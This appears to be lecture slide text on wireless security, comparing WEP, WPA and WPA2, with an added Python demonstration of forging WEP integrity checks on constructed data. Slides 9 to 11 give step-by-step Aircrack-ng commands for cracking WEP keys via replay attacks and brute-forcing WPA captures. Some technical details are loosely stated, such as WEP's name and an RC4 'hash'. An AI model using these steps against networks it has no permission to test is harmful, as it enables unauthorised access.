OSA vs WEP WPA and WPA II Tools for hacking


1 Wireless Security
OSA vs WEP WPA and WPA II
Tools for hacking

2 OSA vs SKA (1997)
Open System Association | Shared Key Auth
- OSA: Complete Free-for-all – no auth at all
- SKA: Used WEP for Authentication
  - Wireless Equivalent Protocol

3 WEP and why it sucks
- Streaming Algorithm
  - RC4 – stream cipher in synchronous mode
  - Need to keep sync at all times (wireless is bad at that)
- Per-packet master key re-use
  - Every single packet sent holds the RC4 hash
  - More exposure = more vulnerability
- Limited AP keys
  - WEP only allows 1-4 secret keys, so every AP on the network has to share them

4 WEP and why it sucks (cont.)
- No AP to client auth
  - MITM attacks are easy
- Confidentiality
  - Vulnerabilities in header
  - Headers aren't verified by Integrity Checker
  - Makes Redirection Attacks easy
- Integrity Checker is basically garbage
  - No sequence numbers or timestamps
  - Replay attacks are easy and effective
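Added example (not from the original slides): why slide 4 can call the WEP integrity checker garbage, shown on a constructed frame body. WEP's ICV is an unkeyed CRC-32 encrypted under an RC4 XOR stream, so a payload change and its matching ICV change can be applied without the key, while a keyed tag changes unpredictably. The IV, key and payloads are constructed values, and HMAC-SHA256 is a stand-in for a keyed MAC, not the one WPA or WPA2 actually use.

```python
import hashlib
import hmac
import zlib

IV, KEY = bytes.fromhex("0a0b0c"), bytes.fromhex("0102030405")  # constructed
PAYLOAD, ALTERED = b"port=8080 allow=0", b"port=8080 allow=1"   # constructed

def rc4(key: bytes, n: int) -> bytes:
    """n bytes of RC4 keystream; WEP seeds it with IV || shared key."""
    s, j = list(range(256)), 0
    for i in range(256):  # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(n):  # keystream generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def icv(data: bytes) -> bytes:
    """WEP integrity check value: unkeyed CRC-32 of the plaintext."""
    return zlib.crc32(data).to_bytes(4, "little")

def wep_seal(iv: bytes, key: bytes, payload: bytes) -> bytes:
    body = payload + icv(payload)
    return xor(body, rc4(iv + key, len(body)))

def wep_icv_ok(iv: bytes, key: bytes, ct: bytes) -> bool:
    body = xor(ct, rc4(iv + key, len(ct)))
    return icv(body[:-4]) == body[-4:]

def keyless_edit(ct: bytes, delta: bytes) -> bytes:
    """CRC-32 is linear over XOR: the ICV change matching a payload change
    `delta` follows from `delta` alone, so no key is needed to fix it up."""
    icv_delta = xor(icv(delta), icv(bytes(len(delta))))
    return xor(ct, delta + icv_delta)

def mac_tag(mac_key: bytes, payload: bytes) -> bytes:
    """Contrast: keyed tag (HMAC-SHA256 as a stand-in, not WPA's own MIC)."""
    return hmac.new(mac_key, payload, hashlib.sha256).digest()

if __name__ == "__main__":
    edited = keyless_edit(wep_seal(IV, KEY, PAYLOAD), xor(PAYLOAD, ALTERED))
    print("WEP ICV accepts keyless edit:", wep_icv_ok(IV, KEY, edited))
    print("keyed tag unchanged:", mac_tag(KEY, PAYLOAD) == mac_tag(KEY, ALTERED))
```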

5 WPA (2003)
- Attempt to re-engineer WEP while using hardware already available
- Movements towards standardization
  - 802.11i – group for increased security
  - WiFi Alliance – standardization between vendors

6 Improvements on WEP
WPA Improvements
- Integrity checker allowed for 56 bits (stronger keys)
- Passwords sent per session, not per packet
- Auth built on 802.1X framework and TKIP
- Packet sequence numbers (no replay attacks)
- Integrity checker for header and payload (no redirection attacks)

7 Improvements on WPA
WPA2 (2004)
- Transition to AES instead of RC4
  - Way stronger in general
- Revamped Integrity Checking
  - Leverage AES and better hardware
- CCMP (Counter Mode Cipher Block Chaining Message Authentication Code Protocol) (wtf)
  - Basically encrypted encapsulation
- More secure key establishment and auth

8 Aircrack-ng
Suite of tools for assessing WiFi network security
- Monitoring (packet capturing and processing)
- Attacking (replay attacks, deauths, fake AP, etc)
- Testing
- Cracking (WEP and WPA PSK I+II)

9 Using it to break WEP
- iwconfig – check for wireless capabilities
- airmon-ng start wlan0
  - Set your wireless card to monitor mode
- airodump-ng mon0
  - Start monitoring for crazy stuff in the air
  - Searching for APs (John's iPhone)
- airodump-ng --bssid "mac" -c "channel" -w WEPCrack mon0

10 Using it to break WEP
- Open a different terminal
- aireplay-ng -3 -b 'AP_mac' -h 'host_mac' mon0
  - Initiate a replay attack
  - Looking for about 15k+ #Data
- aircrack-ng WEPCrack-01.cap
  - Cracking
  - Just wait for it and hope basically

11 Using it to crack WPA
- Basically the same method besides the last part
- WPA is strong enough that you have to bruteforce the pcap instead of doing analysis
- oclHashcat > Aircrack-ng because of rainbow tables and rule-based cracking
  - 5 minutes vs 2 hours

